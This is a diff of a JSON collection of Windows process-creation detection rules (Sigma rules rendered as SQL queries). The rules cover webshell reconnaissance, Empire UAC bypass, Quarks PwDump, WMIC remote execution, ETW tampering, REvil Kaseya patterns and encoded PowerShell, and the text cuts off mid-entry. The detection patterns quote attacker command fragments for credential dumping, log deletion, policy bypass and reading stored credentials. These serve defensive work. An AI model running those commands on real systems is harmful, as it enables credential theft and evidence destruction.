"filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", - "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "status": "stable", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", + "status": "test", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Programs that use the same command line flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Wscript Execution from Non C Drive", - "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "title": "WMIC Remote Command Execution", + "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", "status": "experimental", - "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", - "author": "Aaron Herman", + "description": "Detects the execution of WMIC to query information on a remote system", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ - "Legitimate scripts located on other partitions such as \"D:\"" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" + "filename": "proc_creation_win_wmic_remote_execution.yml" }, { - "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", - "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", - "status": "experimental", - "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", - "author": "Florian Roth (Nextron Systems), Hieu Tran", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "status": "test", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", + "tags": [ + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" + ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_download_dll.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", - "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "status": "test", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Unlikely" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Potential UAC Bypass Via Sdclt.EXE", + "id": "40f9af16-589d-4984-b78d-8c2aec023197", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1012", + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1548.002" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_uac_bypass_sdclt.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "title": "Psr.exe Capture Screenshots", + "id": "2158f96f-43c2-43cb-952a-ab4580f32382", + "status": "test", + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1113" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_psr_capture_screenshots.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", + "id": "47e4bab7-c626-47dc-967b-255608c9a920", + "status": "experimental", + "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_findstr_recon_everyone.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.defense_evasion", + "attack.t1218.002", + "attack.persistence", + "attack.t1546" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", "attack.defense_evasion", - "attack.t1562.004" + "attack.t1218.005", + "attack.t1027.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "WMIC Remote Command Execution", - "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", + "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", + "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", "status": "experimental", - "description": "Detects the execution of WMIC to query information on a remote system", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_remote_execution.yml" + "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Audio Capture via PowerShell", + "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "status": "test", + "description": "Detects audio capture via PowerShell Cmdlet.", + "author": 